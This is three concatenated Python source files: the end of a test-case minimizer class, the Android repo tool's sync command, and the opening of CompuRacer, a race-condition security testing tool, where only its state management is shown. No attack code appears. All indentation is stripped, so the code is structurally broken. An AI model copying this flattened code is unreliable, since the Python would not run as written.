result = kwargs[key]
del kwargs[key]
except KeyError:
pass
return result
def _execute(self, data):
"""Perform minimization on a test case."""
raise NotImplementedError
def minimize(self, data):
"""Wrapper to perform common tasks and call |_execute|."""
try:
testcase = self._execute(data)
except errors.MinimizationDeadlineExceededError as error:
# When a MinimizationDeadlineExceededError is raised, the partially
# minimized test case is stored with it so that we can recover the work
# that had been done up to that point.
testcase = error.testcase
except errors.TokenizationFailureError:
logs.log('Tokenized data did not match original data. Defaulting to line '
'minimization.')
# In situation where the tokenizer does not work, we still want to use
# the token combiner. This will not change the data unless
# token combiner changes the data such as appending extra data to the
# start or end. If this is the case, that change will be expected
# in the return.
return self.token_combiner([data])
return testcase.get_result()
def validate_tokenizer(self, data, testcase):
"""Validate that the tokenizer correctly tokenized the data. This is
necessary because if the tokenizer does not recognize a character, it will
skip it."""
# If data is a list, it means we're not minimizing a test case but another
# feature such as files or command line arguments. In these cases, we don't
# rely on a tokenizer.
if isinstance(data, list):
return True
# For most token_combiners, using the combiner on data like below will do
# nothing, but in situations where data is changed in the token combiner
# such as data being appended to the start or end of data we want to make
# sure the same change happens to both before comparison.
data = self.token_combiner([data])
return testcase.get_current_testcase_data() == data
@staticmethod
def run(data, thread_count=DEFAULT_THREAD_COUNT, file_extension=''):
"""Minimize |data| using this minimizer's default configuration."""
raise NotImplementedError
|
sync.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import netrc
from optparse import SUPPRESS_HELP
import os
import pickle
import re
import shutil
import socket
import subprocess
import sys
import time
from pyversion import is_python3
if is_python3():
import urllib.parse
import xmlrpc.client
else:
import imp
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.parse = urlparse
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
from git_command import GIT, git_require
from git_refs import R_HEADS, HEAD
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
from project import SyncBuffer
from progress import Progress
from wrapper import Wrapper
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
The -f/--force-broken option can be used to proceed with syncing
other projects if a project sync fails.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
SSH Connections
---------------
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
Compatibility
~~~~~~~~~~~~~
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help="continue sync even if a project fails to sync")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from a known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchProjectList(self, opt, projects, *args):
"""Main function of the fetch threads when jobs are > 1.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
*args: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
for project in projects:
success = self._FetchHelper(opt, project, *args)
if not success and not opt.force_broken:
break
def _FetchHelper(self, opt, project, lock, fetched, pm, sem, err_event):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
err_event: We'll set this event in the case of an error (after printing
out info about the error).
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we call sem.release().
# - We always make sure we unlock the lock if we locked it.
try:
try:
start = time.time()
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags, archive=self.manifest.IsArchive)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync',
file=sys.stderr)
else:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
err_event.set()
except:
err_event.set()
raise
finally:
if did_lock:
lock.release()
sem.release()
return success
def _Fetch(self, projects, opt):
fetched = set()
pm = Progress('Fetching projects', len(projects))
if self.jobs == 1:
for project in projects:
pm.update()
if not opt.quiet:
print('Fetching project %s' % project.name)
if project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags,
archive=self.manifest.IsArchive):
fetched.add(project.gitdir)
else:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync', file=sys.stderr)
else:
sys.exit(1)
else:
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
lock = _threading.Lock()
sem = _threading.Semaphore(self.jobs)
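# The semaphore caps live fetch threads at self.jobs: the loop below acquires
# it before spawning each worker, and _FetchHelper releases it in its finally
# block when the worker finishes.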
err_event = _threading.Event()
for project_list in objdir_project_map.values():
# Check for any errors before starting any new threads.
# ...we'll let existing threads finish, though.
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target = self._FetchProjectList,
args = (opt,
project_list,
lock,
fetched,
pm,
sem,
err_event))
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet():
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects)
return fetched
def _GCProjects(self, projects):
gitdirs = {}
for project in projects:
gitdirs[project.gitdir] = project.bare_git
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
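# Spread the available cores over the concurrent gc invocations, e.g. 8 cores
# and 4 jobs gives pack.threads=2 per repository.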
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for bare_git in gitdirs.values():
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
for path in old_project_paths:
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
if os.path.exists(self.manifest.topdir + '/' + path):
gitdir = os.path.join(self.manifest.topdir, path, '.git')
project = Project(
manifest = self.manifest,
name = path,
remote = RemoteSpec('origin'),
gitdir = gitdir,
objdir = gitdir,
worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty():
print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return -1
else:
print('Deleting obsolete path %s' % project.worktree,
file=sys.stderr)
shutil.rmtree(project.worktree)
# Try deleting parent subdirs if they are empty
project_dir = os.path.dirname(project.worktree)
while project_dir != self.manifest.topdir:
try:
os.rmdir(project_dir)
except OSError:
break
project_dir = os.path.dirname(project_dir)
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
if opt.network_only and opt.detach_head:
print('error: cannot combine -n and -d', file=sys.stderr)
sys.exit(1)
if opt.network_only and opt.local_only:
print('error: cannot combine -n and -l', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_sync:
print('error: cannot combine -m and -s', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_tag:
print('error: cannot combine -m and -t', file=sys.stderr)
sys.exit(1)
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
print('error: -u and -p may only be combined with -s or -t',
file=sys.stderr)
sys.exit(1)
if None in [opt.manifest_server_username, opt.manifest_server_password]:
print('error: both -u and -p must be given', file=sys.stderr)
sys.exit(1)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
print('.netrc file does not exist or could not be opened',
file=sys.stderr)
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
username, _account, password = \
info.authenticators(parse_result.hostname)
except TypeError:
# TypeError is raised when the given hostname is not present
# in the .netrc file.
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
try:
server = xmlrpc.client.Server(manifest_server)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = "smart_sync_override.xml"
manifest_path = os.path.join(self.manifest.manifestProject.worktree,
manifest_name)
try:
f = open(manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError:
print('error: cannot write manifest to %s' % manifest_path,
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
mp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from endlessly fetching actually-missing repos: if the set of
# missing repos has not changed since the last fetch, break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList():
sys.exit(1)
syncbuf = SyncBuffer(mp.config,
detach_head = opt.detach_head)
pm = Progress('Syncing work tree', len(all_projects))
for project in all_projects:
pm.update()
if project.worktree:
project.Sync_LocalHalf(syncbuf)
pm.end()
print(file=sys.stderr)
if not syncbuf.Finish():
sys.exit(1)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo.',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
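# A describe result such as 'v1.12.37-5-g1a2b3c4' means the revision is some
# commits past the nearest tag, so there is no signed tag to verify.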
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repopickle_fetchtimes')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a*t) + ((1-a) * old)
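# Exponential moving average with alpha 0.5: e.g. old = 40s and t = 20s gives
# 0.5*20 + 0.5*40 = 30s, so older samples decay with every new fetch.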
def _Load(self):
if self._times is None:
try:
f = open(self._path, 'rb')
except IOError:
self._times = {}
return self._times
try:
try:
self._times = pickle.load(f)
except IOError:
try:
os.remove(self._path)
except OSError:
pass
self._times = {}
finally:
f.close()
return self._times
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'wb')
try:
pickle.dump(self._times, f)
except (IOError, OSError, pickle.PickleError):
try:
os.remove(self._path)
except OSError:
pass
finally:
f.close()
|
compu_racer_core.py
|
#!/usr/bin/env python3
"""
The CompuRacer class is the heart of the application that manages requests, batches, storage and sending/receiving.
"""
# --- All imports --- #
import copy
import os
import queue
import signal
import threading
import time
import urllib
from enum import Enum
from functools import partial
from multiprocessing import Queue
try:
from tkinter import *
from tkinter import filedialog
except ModuleNotFoundError as e:
# this only happens if the system has no display
# and then we will not use this lib anyway
# look at the check in ../main.py
pass
from tqdm import tqdm
from tabulate import tabulate
import src.batch_sender_async as sender
from src import utils
from .batch import Batch
from .command_processor import CommandProcessor
from .rest_server import RestServer
root = None
try:
root = Tk()
root.withdraw()
except Exception as e:
# this only happens if the system has no display
# and then we will not use this anyway
# look at the check in ../main.py
pass
# --- Authorship information --- #
__author__ = "R.J. van Emous @ Computest"
__license__ = "MIT License"
__version__ = "2019"
__email__ = "rvanemous@computest.nl"
__status__ = "Prototype"
class SortOrder(Enum):
"""
An enum that holds the four supported sort orders
"""
INDEX = partial(lambda x: int(x['id']))
TIME = partial(lambda x: x['timestamp'])
METHOD = partial(lambda x: x['method'])
URL = partial(lambda x: x['url'])
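# The lambdas are wrapped in functools.partial so that Enum stores them as
# plain values instead of turning them into methods of SortOrder.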
def __str__(self):
return f"SortOrder.{self.name}"
class CompuRacer:
"""
The Core of the race condition testing application
"""
# -------------- String constants -------------- #
CLIENT_VERSION = "1.2"
CLIENT_FILE_lOC = "state/"
CLIENT_CONFIG = CLIENT_FILE_lOC + "state.json"
CLIENT_BACKUP = CLIENT_FILE_lOC + "state.json.backup"
CLIENT_BATCHES_LOC = CLIENT_FILE_lOC + "batches/"
BATCHES_RENDERED_FILE_DIR = 'rendered_files/'
BATCHES_EXP_FILE_DIR = 'exp_files/'
CLI_PROMPT = "racer"
# -------------- Globals -------------- #
# general
shutdown_client = False
is_shutdown = False
requests_list_lock = threading.RLock()
# CompuRacer specific
command_processor = None
rest_interface_thread = None
proxy = None
server_queue = None
server_send_queue = None
dialog_queue = None
state = None
immediate_batch_name = "Imm"
progress_bar_width = 100
def __init__(self, port, proxy, queue):
"""
Creates a new CompuRacer instance
:param queue: the queue to be used when we want to display a filepicker dialog to the user
"""
self.proxy = proxy
# if the queue is None, we cannot and will not show dialogs
self.dialog_queue = queue
# add shutdown hooks
signal.signal(signal.SIGINT, self.force_shutdown)
signal.signal(signal.SIGTERM, self.force_shutdown)
# initialize command processor (just for printing)
self.command_processor = CommandProcessor(self.state)
self.command_processor.set_cli_prompt(self.CLI_PROMPT)
# load main client settings and requests
if os.path.exists(self.CLIENT_FILE_lOC) and \
(os.path.exists(self.CLIENT_CONFIG) or os.path.exists(self.CLIENT_BACKUP)):
utils.clear_output()
self.state = self.get_default_state()
self.command_processor.set_config(self.state)
self.state = self.__load_json(self.CLIENT_CONFIG, self.CLIENT_BACKUP, "Loading current configuration..")
# compatibility with v1.0 and v1.1 state file
self.patch_state_to_v12()
if self.state is None:
# set temp config in command processor
self.state = self.get_default_state()
self.command_processor.set_config(self.state)
self.start_new_state_setup()
# set config in command processor
self.command_processor.set_config(self.state)
# load all batches into state
if not os.path.exists(self.CLIENT_BATCHES_LOC):
os.mkdir(self.CLIENT_BATCHES_LOC)
else:
time.sleep(0.25)
for file in tqdm(os.listdir(self.CLIENT_BATCHES_LOC), desc="Loading batches", ncols=self.progress_bar_width):
self.imp_batch_without_requests_by_name(self, self.CLIENT_BATCHES_LOC + file)
time.sleep(0.25)
self.print_formatted("Done.", utils.QType.INFORMATION)
# initialize command processor (fully)
self.command_processor.set_welcome_function(self.display_welcome, self)
self.add_all_commands()
# initialize the REST server
self.server_send_queue = Queue()
self.rest_server = RestServer(self.state['immediate_mode'], self.server_send_queue, port=port)
def patch_state_to_v12(self):
if 'immediate_settings' in self.state and len(self.state['immediate_settings']) != 5:
self.state['immediate_settings'] = [15, 1, False, True, 20]
elif 'immediate_dup_par_sec' in self.state:
if len(self.state['immediate_dup_par_sec']) == 2:
self.state['immediate_settings'] = [self.state['immediate_dup_par_sec'][0],
self.state['immediate_dup_par_sec'][1], False, True, 20]
else:
self.state['immediate_settings'] = [15, 1, False, True, 20]
del self.state['immediate_dup_par_sec']
def __str__(self):
"""
A string representation of the CompuRacer
:return: the string
"""
return f"CompuRacer = [state = {utils.format_json(self.jsonify_batches(self.state))}]"
def is_changed(self):
"""
Checks whether the current CompuRacer state is changed
:return: True if changed
"""
if not self.state:
return False
if 'changed' in self.state and self.state['changed']:
return True
if self.command_processor.is_changed():
return True
return False
def set_unchanged(self):
"""
Sets the current CompuRacer state to unchanged
:return: True if changed
"""
if not self.state:
return
if 'changed' in self.state:
self.state['changed'] = False
if self.command_processor.is_changed():
self.command_processor.set_changed(False)
def start(self):
"""
Starts the CompuRacer
"""
# indicate whether we use an upstream SOCKS proxy
if self.proxy:
self.print_formatted(f"Using upstream SOCKS proxy: '{self.proxy}'", utils.QType.INFORMATION)
# start the REST server
self.server_queue = self.rest_server.start(self)
# start rest server interfacer (also takes care of immediate thread creation)
self.print_formatted("Starting REST server interface thread..", utils.QType.INFORMATION)
self.rest_interface_thread = threading.Thread(name='REST server interfacer',
target=self.run_rest_server_interfacer,
args=(self, self.server_queue))
self.rest_interface_thread.start()
self.print_formatted("Done..", utils.QType.INFORMATION)
# start client interpreter
self.print_formatted("Starting command processor..", utils.QType.INFORMATION)
time.sleep(0.25)
utils.clear_output()
self.command_processor.start()
def comm_general_save(self, do_print=True):
"""
Stores the current CompuRacer state when changed.
The main settings and requests will be saved in one file and all batches will be saved in one file each
:param do_print: if True, prints the progress
"""
saved_anything = False
# store general state of racer and the requests
if self.is_changed():
saved_anything = True
store_string = None
if do_print:
store_string = "Storing current state.."
state_to_save = copy.deepcopy(self.state)
state_to_save['batches'] = {}
self.set_unchanged()
self.__store_json(self.CLIENT_CONFIG, state_to_save, self.CLIENT_BACKUP, store_string)
time.sleep(0.25)
# store individual batches
if not os.path.exists(self.CLIENT_BATCHES_LOC):
os.mkdir(self.CLIENT_BATCHES_LOC)
if 'batches' in self.state:
for batch_name in tqdm(list(self.state['batches'].keys()), desc="Storing batches", ncols=self.progress_bar_width):
if self.state['batches'][batch_name].changed:
saved_anything = True
self.state['batches'][batch_name].changed = False
self.exp_batch_without_requests_by_name(self, self.CLIENT_BATCHES_LOC, batch_name)
time.sleep(0.25)
# print whether it is changed
if not saved_anything and do_print:
self.print_formatted("State not changed.", string_type=utils.QType.INFORMATION)
elif do_print:
self.print_formatted("Done.", string_type=utils.QType.INFORMATION)
def comm_general_shutdown(self, args=None):
"""
Shuts down the CompuRacer normally
:param args: required for shutdown hook, not used
"""
print()
self.print_formatted("Shutting down client..", string_type=utils.QType.INFORMATION)
self.shutdown_client = True
if self.rest_interface_thread:
self.print_formatted("Stopping rest interface thread..", utils.QType.INFORMATION)
self.rest_interface_thread.join()
self.print_formatted("Done.", utils.QType.INFORMATION)
if self.command_processor:
self.command_processor.shutdown()
self.comm_general_save(True)
self.print_formatted("Done.", string_type=utils.QType.INFORMATION)
self.is_shutdown = True
# only to be called by os signal exit (like after CTRL-C)
def force_shutdown(self, arg=None, arg2=None):
"""
Shuts down the CompuRacer immediately
:param arg: required for shutdown hook, not used
:param arg2: ditto
"""
# shutdown initiated, stop rest server, command processor, save state and exit
print()
self.shutdown_client = True
if self.rest_interface_thread:
self.rest_interface_thread.join()
if self.command_processor:
self.command_processor.shutdown(False)
self.comm_general_save(False)
self.is_shutdown = True
def start_new_state_setup(self):
"""
Client setup wizard used on first install
"""
utils.clear_output()
self.print_formatted("# ------- CompuRacer v{} -- setup state ------- #\n".format(self.CLIENT_VERSION),
utils.QType.GREEN)
if not self.command_processor.accept_yes_no("No client state file detected in '{}'. "
"Do you want to setup a new client?".format(self.CLIENT_FILE_lOC),
string_type=utils.QType.WARNING):
self.print_formatted("Please create or import a new state file into: '{}'. \n"
"\tExiting..".format(self.CLIENT_CONFIG), utils.QType.INFORMATION)
exit(0)
else:
self.print_formatted("Creating a new client setup..", utils.QType.INFORMATION)
if not os.path.exists(self.CLIENT_FILE_lOC):
os.mkdir(self.CLIENT_FILE_lOC)
utils.print_colored("This is some RED text.", utils.Color.RED)
colored_output = self.command_processor.accept_yes_no("Is the line above colored red?")
self.print_formatted(f"Colored output enabled is set to: '{colored_output}'", utils.QType.INFORMATION)
self.state = self.create_new_state(colored_output)
self.__store_json(self.CLIENT_CONFIG, self.objectify_batches(self, copy.deepcopy(self.state)),
"Storing current configuration..")
# create batches folder
if not os.path.exists(self.CLIENT_BATCHES_LOC):
os.mkdir(self.CLIENT_BATCHES_LOC)
self.print_formatted("# ------- state setup finished ------- #\n".format(self.CLIENT_VERSION),
utils.QType.GREEN)
